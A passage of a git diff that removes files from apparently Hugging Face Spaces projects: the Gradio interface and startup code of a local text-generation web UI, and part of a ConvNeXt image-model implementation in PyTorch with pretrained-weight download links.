gr.Row(): - shared.gradio['instruction_template'] = gr.Dropdown(choices=utils.get_available_instruction_templates(), label='Instruction template', value='None', info='Change this according to the model/LoRA that you are using. Used in instruct and chat-instruct modes.', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['instruction_template'], lambda: None, lambda: {'choices': utils.get_available_instruction_templates()}, 'refresh-button') - shared.gradio['save_template'] = gr.Button('💾', elem_classes='refresh-button') - shared.gradio['delete_template'] = gr.Button('🗑️ ', elem_classes='refresh-button') - - shared.gradio['name1_instruct'] = gr.Textbox(value='', lines=2, label='User string') - shared.gradio['name2_instruct'] = gr.Textbox(value='', lines=1, label='Bot string') - shared.gradio['context_instruct'] = gr.Textbox(value='', lines=4, label='Context') - shared.gradio['turn_template'] = gr.Textbox(value=shared.settings['turn_template'], lines=1, label='Turn template', info='Used to precisely define the placement of spaces and new line characters in instruction prompts.') - with gr.Row(): - shared.gradio['chat-instruct_command'] = gr.Textbox(value=shared.settings['chat-instruct_command'], lines=4, label='Command for chat-instruct mode', info='<|character|> gets replaced by the bot name, and <|prompt|> gets replaced by the regular chat prompt.') - - with gr.Tab('Chat history'): - with gr.Row(): - with gr.Column(): - shared.gradio['download'] = gr.File(label="Download") - shared.gradio['download_button'] = gr.Button(value='Refresh') - - with gr.Column(): - shared.gradio['upload_chat_history'] = gr.File(type='binary', file_types=['.json', '.txt'], label="Upload") - - with gr.Tab('Upload character'): - with gr.Tab('JSON'): - with gr.Row(): - shared.gradio['upload_json'] = gr.File(type='binary', file_types=['.json'], label='JSON File') - shared.gradio['upload_img_bot'] = gr.Image(type='pil', label='Profile Picture (optional)') - - 
shared.gradio['Submit character'] = gr.Button(value='Submit', interactive=False) - - with gr.Tab('TavernAI'): - with gr.Row(): - with gr.Column(): - shared.gradio['upload_img_tavern'] = gr.Image(type='pil', label='TavernAI PNG File', elem_id="upload_img_tavern") - shared.gradio['tavern_json'] = gr.State() - with gr.Column(): - shared.gradio['tavern_name'] = gr.Textbox(value='', lines=1, label='Name', interactive=False) - shared.gradio['tavern_desc'] = gr.Textbox(value='', lines=4, max_lines=4, label='Description', interactive=False) - - shared.gradio['Submit tavern character'] = gr.Button(value='Submit', interactive=False) - - with gr.Tab("Parameters", elem_id="parameters"): - create_settings_menus(default_preset) - - # Create notebook mode interface - elif shared.args.notebook: - shared.input_elements = ui.list_interface_input_elements() - shared.gradio['interface_state'] = gr.State({k: None for k in shared.input_elements}) - shared.gradio['last_input'] = gr.State('') - with gr.Tab("Text generation", elem_id="main"): - with gr.Row(): - with gr.Column(scale=4): - with gr.Tab('Raw'): - shared.gradio['textbox'] = gr.Textbox(value=default_text, elem_classes="textbox", lines=27) - - with gr.Tab('Markdown'): - shared.gradio['markdown_render'] = gr.Button('Render') - shared.gradio['markdown'] = gr.Markdown() - - with gr.Tab('HTML'): - shared.gradio['html'] = gr.HTML() - - with gr.Row(): - shared.gradio['Generate'] = gr.Button('Generate', variant='primary', elem_classes="small-button") - shared.gradio['Stop'] = gr.Button('Stop', elem_classes="small-button") - shared.gradio['Undo'] = gr.Button('Undo', elem_classes="small-button") - shared.gradio['Regenerate'] = gr.Button('Regenerate', elem_classes="small-button") - - with gr.Column(scale=1): - gr.HTML('
    ') - shared.gradio['max_new_tokens'] = gr.Slider(minimum=shared.settings['max_new_tokens_min'], maximum=shared.settings['max_new_tokens_max'], step=1, label='max_new_tokens', value=shared.settings['max_new_tokens']) - with gr.Row(): - shared.gradio['prompt_menu'] = gr.Dropdown(choices=utils.get_available_prompts(), value='None', label='Prompt', elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['prompt_menu'], lambda: None, lambda: {'choices': utils.get_available_prompts()}, ['refresh-button', 'refresh-button-small']) - shared.gradio['save_prompt'] = gr.Button('💾', elem_classes=['refresh-button', 'refresh-button-small']) - shared.gradio['delete_prompt'] = gr.Button('🗑️', elem_classes=['refresh-button', 'refresh-button-small']) - - shared.gradio['count_tokens'] = gr.Button('Count tokens') - shared.gradio['status'] = gr.Markdown('') - - with gr.Tab("Parameters", elem_id="parameters"): - create_settings_menus(default_preset) - - # Create default mode interface - else: - shared.input_elements = ui.list_interface_input_elements() - shared.gradio['interface_state'] = gr.State({k: None for k in shared.input_elements}) - shared.gradio['last_input'] = gr.State('') - with gr.Tab("Text generation", elem_id="main"): - with gr.Row(): - with gr.Column(): - shared.gradio['textbox'] = gr.Textbox(value=default_text, elem_classes="textbox_default", lines=27, label='Input') - shared.gradio['max_new_tokens'] = gr.Slider(minimum=shared.settings['max_new_tokens_min'], maximum=shared.settings['max_new_tokens_max'], step=1, label='max_new_tokens', value=shared.settings['max_new_tokens']) - with gr.Row(): - shared.gradio['Generate'] = gr.Button('Generate', variant='primary') - shared.gradio['Stop'] = gr.Button('Stop') - shared.gradio['Continue'] = gr.Button('Continue') - shared.gradio['count_tokens'] = gr.Button('Count tokens') - - with gr.Row(): - shared.gradio['prompt_menu'] = gr.Dropdown(choices=utils.get_available_prompts(), value='None', label='Prompt', 
elem_classes='slim-dropdown') - ui.create_refresh_button(shared.gradio['prompt_menu'], lambda: None, lambda: {'choices': utils.get_available_prompts()}, 'refresh-button') - shared.gradio['save_prompt'] = gr.Button('💾', elem_classes='refresh-button') - shared.gradio['delete_prompt'] = gr.Button('🗑️', elem_classes='refresh-button') - - shared.gradio['status'] = gr.Markdown('') - - with gr.Column(): - with gr.Tab('Raw'): - shared.gradio['output_textbox'] = gr.Textbox(elem_classes="textbox_default_output", lines=27, label='Output') - - with gr.Tab('Markdown'): - shared.gradio['markdown_render'] = gr.Button('Render') - shared.gradio['markdown'] = gr.Markdown() - - with gr.Tab('HTML'): - shared.gradio['html'] = gr.HTML() - - with gr.Tab("Parameters", elem_id="parameters"): - create_settings_menus(default_preset) - - # Model tab - with gr.Tab("Model", elem_id="model-tab"): - create_model_menus() - - # Training tab - with gr.Tab("Training", elem_id="training-tab"): - training.create_train_interface() - - # Session tab - with gr.Tab("Session", elem_id="session-tab"): - modes = ["default", "notebook", "chat"] - current_mode = "default" - for mode in modes[1:]: - if getattr(shared.args, mode): - current_mode = mode - break - - cmd_list = vars(shared.args) - bool_list = sorted([k for k in cmd_list if type(cmd_list[k]) is bool and k not in modes + ui.list_model_elements()]) - bool_active = [k for k in bool_list if vars(shared.args)[k]] - - with gr.Row(): - - with gr.Column(): - with gr.Row(): - shared.gradio['interface_modes_menu'] = gr.Dropdown(choices=modes, value=current_mode, label="Mode", elem_classes='slim-dropdown') - shared.gradio['reset_interface'] = gr.Button("Apply and restart", elem_classes="small-button", variant="primary") - shared.gradio['toggle_dark_mode'] = gr.Button('Toggle 💡', elem_classes="small-button") - - with gr.Row(): - with gr.Column(): - shared.gradio['extensions_menu'] = gr.CheckboxGroup(choices=utils.get_available_extensions(), 
value=shared.args.extensions, label="Available extensions", info='Note that some of these extensions may require manually installing Python requirements through the command: pip install -r extensions/extension_name/requirements.txt', elem_classes='checkboxgroup-table') - - with gr.Column(): - shared.gradio['bool_menu'] = gr.CheckboxGroup(choices=bool_list, value=bool_active, label="Boolean command-line flags", elem_classes='checkboxgroup-table') - - with gr.Column(): - if not shared.args.multi_user: - with gr.Row(): - shared.gradio['session_menu'] = gr.Dropdown(choices=utils.get_available_sessions(), value='None', label='Session', elem_classes='slim-dropdown', info='When saving a session, make sure to keep the initial part of the filename (session_chat, session_notebook, or session_default), otherwise it will not appear on this list afterwards.') - ui.create_refresh_button(shared.gradio['session_menu'], lambda: None, lambda: {'choices': utils.get_available_sessions()}, ['refresh-button']) - shared.gradio['save_session'] = gr.Button('💾', elem_classes=['refresh-button']) - shared.gradio['delete_session'] = gr.Button('🗑️', elem_classes=['refresh-button']) - - extension_name = gr.Textbox(lines=1, label='Install or update an extension', info='Enter the GitHub URL below and press Enter. For a list of extensions, see: https://github.com/oobabooga/text-generation-webui-extensions ⚠️ WARNING ⚠️ : extensions can execute arbitrary code. 
Make sure to inspect their source code before activating them.') - extension_status = gr.Markdown() - - extension_name.submit( - clone_or_pull_repository, extension_name, extension_status, show_progress=False).then( - lambda: gr.update(choices=utils.get_available_extensions(), value=shared.args.extensions), None, gradio('extensions_menu')) - - # Reset interface event - shared.gradio['reset_interface'].click( - set_interface_arguments, gradio('interface_modes_menu', 'extensions_menu', 'bool_menu'), None).then( - lambda: None, None, None, _js='() => {document.body.innerHTML=\'

    Reloading...

    \'; setTimeout(function(){location.reload()},2500); return []}') - - shared.gradio['toggle_dark_mode'].click(lambda: None, None, None, _js='() => {document.getElementsByTagName("body")[0].classList.toggle("dark")}') - - # chat mode event handlers - if shared.is_chat(): - shared.input_params = gradio('Chat input', 'start_with', 'interface_state') - clear_arr = gradio('Clear history-confirm', 'Clear history', 'Clear history-cancel') - shared.reload_inputs = gradio('history', 'name1', 'name2', 'mode', 'chat_style') - - gen_events.append(shared.gradio['Generate'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: (x, ''), gradio('textbox'), gradio('Chat input', 'textbox'), show_progress=False).then( - chat.generate_chat_reply_wrapper, shared.input_params, gradio('display', 'history'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - gen_events.append(shared.gradio['textbox'].submit( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: (x, ''), gradio('textbox'), gradio('Chat input', 'textbox'), show_progress=False).then( - chat.generate_chat_reply_wrapper, shared.input_params, gradio('display', 'history'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - gen_events.append(shared.gradio['Regenerate'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - partial(chat.generate_chat_reply_wrapper, regenerate=True), shared.input_params, 
gradio('display', 'history'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - gen_events.append(shared.gradio['Continue'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - partial(chat.generate_chat_reply_wrapper, _continue=True), shared.input_params, gradio('display', 'history'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - gen_events.append(shared.gradio['Impersonate'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda x: x, gradio('textbox'), gradio('Chat input'), show_progress=False).then( - chat.impersonate_wrapper, shared.input_params, gradio('textbox'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - ) - - shared.gradio['Replace last reply'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.replace_last_reply, gradio('textbox', 'interface_state'), gradio('history')).then( - lambda: '', None, gradio('textbox'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['Send dummy message'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.send_dummy_message, gradio('textbox', 
'interface_state'), gradio('history')).then( - lambda: '', None, gradio('textbox'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['Send dummy reply'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.send_dummy_reply, gradio('textbox', 'interface_state'), gradio('history')).then( - lambda: '', None, gradio('textbox'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['Clear history'].click(lambda: [gr.update(visible=True), gr.update(visible=False), gr.update(visible=True)], None, clear_arr) - shared.gradio['Clear history-cancel'].click(lambda: [gr.update(visible=False), gr.update(visible=True), gr.update(visible=False)], None, clear_arr) - shared.gradio['Clear history-confirm'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: [gr.update(visible=False), gr.update(visible=True), gr.update(visible=False)], None, clear_arr).then( - chat.clear_chat_log, gradio('interface_state'), gradio('history')).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['Remove last'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.remove_last_message, gradio('history'), gradio('textbox', 'history'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')).then( - chat.save_persistent_history, gradio('history', 'character_menu', 'mode'), None) - - shared.gradio['character_menu'].change( - partial(chat.load_character, instruct=False), gradio('character_menu', 'name1', 
'name2'), gradio('name1', 'name2', 'character_picture', 'greeting', 'context', 'dummy')).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - chat.load_persistent_history, gradio('interface_state'), gradio('history')).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - shared.gradio['Stop'].click( - stop_everything_event, None, None, queue=False, cancels=gen_events if shared.args.no_stream else None).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - shared.gradio['mode'].change( - lambda x: gr.update(visible=x != 'instruct'), gradio('mode'), gradio('chat_style'), show_progress=False).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - shared.gradio['chat_style'].change(chat.redraw_html, shared.reload_inputs, gradio('display')) - shared.gradio['instruction_template'].change( - partial(chat.load_character, instruct=True), gradio('instruction_template', 'name1_instruct', 'name2_instruct'), gradio('name1_instruct', 'name2_instruct', 'dummy', 'dummy', 'context_instruct', 'turn_template')) - - shared.gradio['upload_chat_history'].upload( - chat.load_history, gradio('upload_chat_history', 'history'), gradio('history')).then( - chat.redraw_html, shared.reload_inputs, gradio('display')) - - shared.gradio['Copy last reply'].click(chat.send_last_reply_to_input, gradio('history'), gradio('textbox'), show_progress=False) - - # Save/delete a character - shared.gradio['save_character'].click( - lambda x: x, gradio('name2'), gradio('save_character_filename')).then( - lambda: gr.update(visible=True), None, gradio('character_saver')) - - shared.gradio['delete_character'].click(lambda: gr.update(visible=True), None, gradio('character_deleter')) - - shared.gradio['save_template'].click( - lambda: 'My Template.yaml', None, gradio('save_filename')).then( - lambda: 'characters/instruction-following/', None, gradio('save_root')).then( - chat.generate_instruction_template_yaml, 
gradio('name1_instruct', 'name2_instruct', 'context_instruct', 'turn_template'), gradio('save_contents')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['delete_template'].click( - lambda x: f'{x}.yaml', gradio('instruction_template'), gradio('delete_filename')).then( - lambda: 'characters/instruction-following/', None, gradio('delete_root')).then( - lambda: gr.update(visible=True), None, gradio('file_deleter')) - - shared.gradio['download_button'].click(chat.save_history_at_user_request, gradio('history', 'character_menu', 'mode'), gradio('download')) - shared.gradio['Submit character'].click(chat.upload_character, gradio('upload_json', 'upload_img_bot'), gradio('character_menu')) - shared.gradio['upload_json'].upload(lambda: gr.update(interactive=True), None, gradio('Submit character')) - shared.gradio['upload_json'].clear(lambda: gr.update(interactive=False), None, gradio('Submit character')) - - shared.gradio['Submit tavern character'].click(chat.upload_tavern_character, gradio('upload_img_tavern', 'tavern_json'), gradio('character_menu')) - shared.gradio['upload_img_tavern'].upload(chat.check_tavern_character, gradio('upload_img_tavern'), gradio('tavern_name', 'tavern_desc', 'tavern_json', 'Submit tavern character'), show_progress=False) - shared.gradio['upload_img_tavern'].clear(lambda: (None, None, None, gr.update(interactive=False)), None, gradio('tavern_name', 'tavern_desc', 'tavern_json', 'Submit tavern character'), show_progress=False) - shared.gradio['your_picture'].change( - chat.upload_your_profile_picture, gradio('your_picture'), None).then( - partial(chat.redraw_html, reset_cache=True), shared.reload_inputs, gradio('display')) - - # notebook/default modes event handlers - else: - shared.input_params = gradio('textbox', 'interface_state') - if shared.args.notebook: - output_params = gradio('textbox', 'html') - else: - output_params = gradio('output_textbox', 'html') - - 
gen_events.append(shared.gradio['Generate'].click( - lambda x: x, gradio('textbox'), gradio('last_input')).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - generate_reply_wrapper, shared.input_params, output_params, show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - # lambda: None, None, None, _js="() => {element = document.getElementsByTagName('textarea')[0]; element.scrollTop = element.scrollHeight}") - ) - - gen_events.append(shared.gradio['textbox'].submit( - lambda x: x, gradio('textbox'), gradio('last_input')).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - generate_reply_wrapper, shared.input_params, output_params, show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - # lambda: None, None, None, _js="() => {element = document.getElementsByTagName('textarea')[0]; element.scrollTop = element.scrollHeight}") - ) - - if shared.args.notebook: - shared.gradio['Undo'].click(lambda x: x, gradio('last_input'), gradio('textbox'), show_progress=False) - shared.gradio['markdown_render'].click(lambda x: x, gradio('textbox'), gradio('markdown'), queue=False) - gen_events.append(shared.gradio['Regenerate'].click( - lambda x: x, gradio('last_input'), gradio('textbox'), show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - generate_reply_wrapper, shared.input_params, output_params, show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - # lambda: None, None, None, _js="() => {element = 
document.getElementsByTagName('textarea')[0]; element.scrollTop = element.scrollHeight}") - ) - else: - shared.gradio['markdown_render'].click(lambda x: x, gradio('output_textbox'), gradio('markdown'), queue=False) - gen_events.append(shared.gradio['Continue'].click( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - generate_reply_wrapper, [shared.gradio['output_textbox']] + shared.input_params[1:], output_params, show_progress=False).then( - ui.gather_interface_values, gradio(shared.input_elements), gradio('interface_state')).then( - lambda: None, None, None, _js=f"() => {{{audio_notification_js}}}") - # lambda: None, None, None, _js="() => {element = document.getElementsByTagName('textarea')[1]; element.scrollTop = element.scrollHeight}") - ) - - shared.gradio['Stop'].click(stop_everything_event, None, None, queue=False, cancels=gen_events if shared.args.no_stream else None) - shared.gradio['prompt_menu'].change(load_prompt, gradio('prompt_menu'), gradio('textbox'), show_progress=False) - shared.gradio['save_prompt'].click( - lambda x: x, gradio('textbox'), gradio('save_contents')).then( - lambda: 'prompts/', None, gradio('save_root')).then( - lambda: utils.current_time() + '.txt', None, gradio('save_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_saver')) - - shared.gradio['delete_prompt'].click( - lambda: 'prompts/', None, gradio('delete_root')).then( - lambda x: x + '.txt', gradio('prompt_menu'), gradio('delete_filename')).then( - lambda: gr.update(visible=True), None, gradio('file_deleter')) - - shared.gradio['count_tokens'].click(count_tokens, gradio('textbox'), gradio('status'), show_progress=False) - - create_file_saving_event_handlers() - - shared.gradio['interface'].load(lambda: None, None, None, _js=f"() => {{{js}}}") - shared.gradio['interface'].load(partial(ui.apply_interface_values, {}, use_persistent=True), None, gradio(ui.list_interface_input_elements()), show_progress=False) - 
if shared.settings['dark_theme']:
-            shared.gradio['interface'].load(lambda: None, None, None, _js="() => document.getElementsByTagName('body')[0].classList.add('dark')")
-
-        if shared.is_chat():
-            shared.gradio['interface'].load(chat.redraw_html, shared.reload_inputs, gradio('display'))
-
-        # Extensions tabs
-        extensions_module.create_extensions_tabs()
-
-        # Extensions block
-        extensions_module.create_extensions_block()
-
-    # Launch the interface
-    shared.gradio['interface'].queue()
-    with OpenMonkeyPatch():
-        if shared.args.listen:
-            shared.gradio['interface'].launch(prevent_thread_lock=True, share=shared.args.share, server_name=shared.args.listen_host or '0.0.0.0', server_port=shared.args.listen_port, inbrowser=shared.args.auto_launch, auth=auth)
-        else:
-            shared.gradio['interface'].launch(prevent_thread_lock=True, share=shared.args.share, server_port=shared.args.listen_port, inbrowser=shared.args.auto_launch, auth=auth)
-
-
-if __name__ == "__main__":
-    # Loading custom settings
-    settings_file = None
-    if shared.args.settings is not None and Path(shared.args.settings).exists():
-        settings_file = Path(shared.args.settings)
-    elif Path('settings.yaml').exists():
-        settings_file = Path('settings.yaml')
-    elif Path('settings.json').exists():
-        settings_file = Path('settings.json')
-
-    if settings_file is not None:
-        logger.info(f"Loading settings from {settings_file}...")
-        with open(settings_file, 'r', encoding='utf-8') as f:
-            file_contents = f.read()
-
-        # Path.suffix includes the leading dot, so compare against ".json", not "json"
-        new_settings = json.loads(file_contents) if settings_file.suffix == ".json" else yaml.safe_load(file_contents)
-        for item in new_settings:
-            shared.settings[item] = new_settings[item]
-
-    # Set default model settings based on settings file
-    shared.model_config['.*'] = {
-        'wbits': 'None',
-        'model_type': 'None',
-        'groupsize': 'None',
-        'pre_layer': 0,
-        'mode': shared.settings['mode'],
-        'skip_special_tokens': shared.settings['skip_special_tokens'],
-        'custom_stopping_strings': shared.settings['custom_stopping_strings'],
-        
'truncation_length': shared.settings['truncation_length'],
-    }
-
-    shared.model_config.move_to_end('.*', last=False)  # Move to the beginning
-
-    # Default extensions
-    extensions_module.available_extensions = utils.get_available_extensions()
-    if shared.is_chat():
-        for extension in shared.settings['chat_default_extensions']:
-            shared.args.extensions = shared.args.extensions or []
-            if extension not in shared.args.extensions:
-                shared.args.extensions.append(extension)
-    else:
-        for extension in shared.settings['default_extensions']:
-            shared.args.extensions = shared.args.extensions or []
-            if extension not in shared.args.extensions:
-                shared.args.extensions.append(extension)
-
-    available_models = utils.get_available_models()
-
-    # Model defined through --model
-    if shared.args.model is not None:
-        shared.model_name = shared.args.model
-
-    # Select the model from a command-line menu
-    elif shared.args.model_menu:
-        if len(available_models) == 0:
-            logger.error('No models are available! Please download at least one.')
-            sys.exit(1)  # exit with a non-zero status on error
-        else:
-            print('The following models are available:\n')
-            for i, model in enumerate(available_models):
-                print(f'{i+1}. {model}')
-
-            print(f'\nWhich one do you want to load? 
1-{len(available_models)}\n') - i = int(input()) - 1 - print() - - shared.model_name = available_models[i] - - # If any model has been selected, load it - if shared.model_name != 'None': - model_settings = get_model_settings_from_yamls(shared.model_name) - shared.settings.update(model_settings) # hijacking the interface defaults - update_model_parameters(model_settings, initial=True) # hijacking the command-line arguments - - # Load the model - shared.model, shared.tokenizer = load_model(shared.model_name) - if shared.args.lora: - add_lora_to_model(shared.args.lora) - - # Forcing some events to be triggered on page load - shared.persistent_interface_state.update({ - 'loader': shared.args.loader or 'Transformers', - }) - - if shared.is_chat(): - shared.persistent_interface_state.update({ - 'mode': shared.settings['mode'], - 'character_menu': shared.args.character or shared.settings['character'], - 'instruction_template': shared.settings['instruction_template'] - }) - - if Path("cache/pfp_character.png").exists(): - Path("cache/pfp_character.png").unlink() - - shared.generation_lock = Lock() - - # Launch the web UI - create_interface() - while True: - time.sleep(0.5) - if shared.need_restart: - shared.need_restart = False - time.sleep(0.5) - shared.gradio['interface'].close() - time.sleep(0.5) - create_interface() diff --git a/spaces/attention-refocusing/Attention-refocusing/gligen/ldm/modules/diffusionmodules/convnext.py b/spaces/attention-refocusing/Attention-refocusing/gligen/ldm/modules/diffusionmodules/convnext.py deleted file mode 100644 index 71956848b6631ecb7ae12b9d684e69e142a3ef45..0000000000000000000000000000000000000000 --- a/spaces/attention-refocusing/Attention-refocusing/gligen/ldm/modules/diffusionmodules/convnext.py +++ /dev/null @@ -1,203 +0,0 @@ -# Copyright (c) Meta Platforms, Inc. and affiliates. - -# All rights reserved. - -# This source code is licensed under the license found in the -# LICENSE file in the root directory of this source tree. 
- - -import torch -import torch.nn as nn -import torch.nn.functional as F -from timm.models.layers import trunc_normal_, DropPath -from timm.models.registry import register_model - -class Block(nn.Module): - r""" ConvNeXt Block. There are two equivalent implementations: - (1) DwConv -> LayerNorm (channels_first) -> 1x1 Conv -> GELU -> 1x1 Conv; all in (N, C, H, W) - (2) DwConv -> Permute to (N, H, W, C); LayerNorm (channels_last) -> Linear -> GELU -> Linear; Permute back - We use (2) as we find it slightly faster in PyTorch - - Args: - dim (int): Number of input channels. - drop_path (float): Stochastic depth rate. Default: 0.0 - layer_scale_init_value (float): Init value for Layer Scale. Default: 1e-6. - """ - def __init__(self, dim, drop_path=0., layer_scale_init_value=1e-6): - super().__init__() - self.dwconv = nn.Conv2d(dim, dim, kernel_size=7, padding=3, groups=dim) # depthwise conv - self.norm = LayerNorm(dim, eps=1e-6) - self.pwconv1 = nn.Linear(dim, 4 * dim) # pointwise/1x1 convs, implemented with linear layers - self.act = nn.GELU() - self.pwconv2 = nn.Linear(4 * dim, dim) - self.gamma = nn.Parameter(layer_scale_init_value * torch.ones((dim)), - requires_grad=True) if layer_scale_init_value > 0 else None - self.drop_path = DropPath(drop_path) if drop_path > 0. else nn.Identity() - - def forward(self, x): - input = x - x = self.dwconv(x) - x = x.permute(0, 2, 3, 1) # (N, C, H, W) -> (N, H, W, C) - x = self.norm(x) - x = self.pwconv1(x) - x = self.act(x) - x = self.pwconv2(x) - if self.gamma is not None: - x = self.gamma * x - x = x.permute(0, 3, 1, 2) # (N, H, W, C) -> (N, C, H, W) - - x = input + self.drop_path(x) - return x - -class ConvNeXt(nn.Module): - r""" ConvNeXt - A PyTorch impl of : `A ConvNet for the 2020s` - - https://arxiv.org/pdf/2201.03545.pdf - - Args: - in_chans (int): Number of input image channels. Default: 3 - num_classes (int): Number of classes for classification head. 
Default: 1000 - depths (tuple(int)): Number of blocks at each stage. Default: [3, 3, 9, 3] - dims (int): Feature dimension at each stage. Default: [96, 192, 384, 768] - drop_path_rate (float): Stochastic depth rate. Default: 0. - layer_scale_init_value (float): Init value for Layer Scale. Default: 1e-6. - head_init_scale (float): Init scaling value for classifier weights and biases. Default: 1. - """ - def __init__(self, in_chans=3, num_classes=1000, - depths=[3, 3, 9, 3], dims=[96, 192, 384, 768], drop_path_rate=0., - layer_scale_init_value=1e-6, head_init_scale=1., - ): - super().__init__() - - self.downsample_layers = nn.ModuleList() # stem and 3 intermediate downsampling conv layers - stem = nn.Sequential( - nn.Conv2d(in_chans, dims[0], kernel_size=4, stride=4), - LayerNorm(dims[0], eps=1e-6, data_format="channels_first") - ) - self.downsample_layers.append(stem) - for i in range(3): - downsample_layer = nn.Sequential( - LayerNorm(dims[i], eps=1e-6, data_format="channels_first"), - nn.Conv2d(dims[i], dims[i+1], kernel_size=2, stride=2), - ) - self.downsample_layers.append(downsample_layer) - - self.stages = nn.ModuleList() # 4 feature resolution stages, each consisting of multiple residual blocks - dp_rates=[x.item() for x in torch.linspace(0, drop_path_rate, sum(depths))] - cur = 0 - for i in range(4): - stage = nn.Sequential( - *[Block(dim=dims[i], drop_path=dp_rates[cur + j], - layer_scale_init_value=layer_scale_init_value) for j in range(depths[i])] - ) - self.stages.append(stage) - cur += depths[i] - - # self.norm = nn.LayerNorm(dims[-1], eps=1e-6) # final norm layer - # self.head = nn.Linear(dims[-1], num_classes) - - # self.apply(self._init_weights) - # self.head.weight.data.mul_(head_init_scale) - # self.head.bias.data.mul_(head_init_scale) - - def _init_weights(self, m): - if isinstance(m, (nn.Conv2d, nn.Linear)): - trunc_normal_(m.weight, std=.02) - nn.init.constant_(m.bias, 0) - - def forward_features(self, x): - for i in range(4): - x = 
self.downsample_layers[i](x) - x = self.stages[i](x) - return x - # return self.norm(x.mean([-2, -1])) # global average pooling, (N, C, H, W) -> (N, C) - - def forward(self, x): - x = self.forward_features(x) - # x = self.head(x) - return x - -class LayerNorm(nn.Module): - r""" LayerNorm that supports two data formats: channels_last (default) or channels_first. - The ordering of the dimensions in the inputs. channels_last corresponds to inputs with - shape (batch_size, height, width, channels) while channels_first corresponds to inputs - with shape (batch_size, channels, height, width). - """ - def __init__(self, normalized_shape, eps=1e-6, data_format="channels_last"): - super().__init__() - self.weight = nn.Parameter(torch.ones(normalized_shape)) - self.bias = nn.Parameter(torch.zeros(normalized_shape)) - self.eps = eps - self.data_format = data_format - if self.data_format not in ["channels_last", "channels_first"]: - raise NotImplementedError - self.normalized_shape = (normalized_shape, ) - - def forward(self, x): - if self.data_format == "channels_last": - return F.layer_norm(x, self.normalized_shape, self.weight, self.bias, self.eps) - elif self.data_format == "channels_first": - u = x.mean(1, keepdim=True) - s = (x - u).pow(2).mean(1, keepdim=True) - x = (x - u) / torch.sqrt(s + self.eps) - x = self.weight[:, None, None] * x + self.bias[:, None, None] - return x - - -model_urls = { - "convnext_tiny_1k": "https://dl.fbaipublicfiles.com/convnext/convnext_tiny_1k_224_ema.pth", - "convnext_small_1k": "https://dl.fbaipublicfiles.com/convnext/convnext_small_1k_224_ema.pth", - "convnext_base_1k": "https://dl.fbaipublicfiles.com/convnext/convnext_base_1k_224_ema.pth", - "convnext_large_1k": "https://dl.fbaipublicfiles.com/convnext/convnext_large_1k_224_ema.pth", - "convnext_tiny_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_tiny_22k_224.pth", - "convnext_small_22k": "https://dl.fbaipublicfiles.com/convnext/convnext_small_22k_224.pth", - 
